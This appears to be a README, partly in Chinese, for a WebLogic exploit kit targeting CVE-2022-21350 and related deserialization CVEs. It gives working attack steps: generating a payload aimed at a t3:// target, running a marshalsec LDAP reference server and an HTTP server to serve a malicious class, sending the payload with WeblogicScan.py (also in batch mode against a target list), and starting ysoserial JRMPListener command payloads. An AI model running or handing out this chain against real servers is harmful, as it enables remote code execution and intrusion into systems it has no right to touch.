为什么两个poc 一个带 com._51pwn.hktalent.CreatJar.main(args); 是用来创建最小生成payload工具时使用的 创建后使用另外一个
运行 CVE-2022-21350_powerBy_51pwn.jar 构建payload报错不影响payload的使用
other exp
CVE_2020_2551
CVE_2020_2555
CVE_2020_2883
CVE_2020_14645
CVE_2020_14756
CVE_2020_14825
CVE_2020_14841
CVE_2021_2394
CVE_2022_21306
CVE_2022_21350
How use
1- generate payload
docker run -d -p 7001:7001 -p 8453:8453 -v $PWD/setDomainEnv.sh:/home/weblogic/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/bin/setDomainEnv.sh hktalent/weblogic:12.2.1.4.0
java -cp CVE-2022-21350_powerBy_51pwn.jar com._51pwn.CVE_2022_21350.Main "t3://127.0.0.1:7001/" "ldap://docker.for.mac.localhost:1389/UpX34defineClass"
2- start ldap server
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://docker.for.mac.localhost:8888/#UpX34defineClass' 1389
3- start http server,for send class file
node httpServer.js
4- send payload
py3 ../WeblogicScan.py --tags 21350 -r -v -u http://127.0.0.1:7001
# more
cat ../T3_ver.txt|awk '{print $1}'|py3 ../WeblogicScan.py --tags 21350 -r -v -s
java -server -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8453,server=y,suspend=n -Djava.compiler=NONE -cp ysuserial-0.9-su18-all.jar org.su18.ysuserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59" java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "open /System/Applications/Calculator.app" >>/Users/51pwn/MyWork/TestPoc/JRMPListener.ser
Where is payload
cat test.ser
Why out error message
Running the error does not affect the generation of the payload and the effect of the payload 运行报错不影响payload的生成、不影响payload的效果
How attack
nuclei -duc -t ./network/detection/weblogic-t3-detect.yaml -l list.txt
tools support:
- 1-weblogic ver
- 12.1.3.0.0
- 12.2.1.3.0
- 12.2.1.4.0
- 2-JDK < 1.8
- 3-Server allow OOB
How build,merge jar
cd lib3
# split
py3 ../tools/splitTools.py -s wlfullclient_12.1.3.jar
# merge
py3 ../tools/splitTools.py -m wlfullclient_12.1.3.jar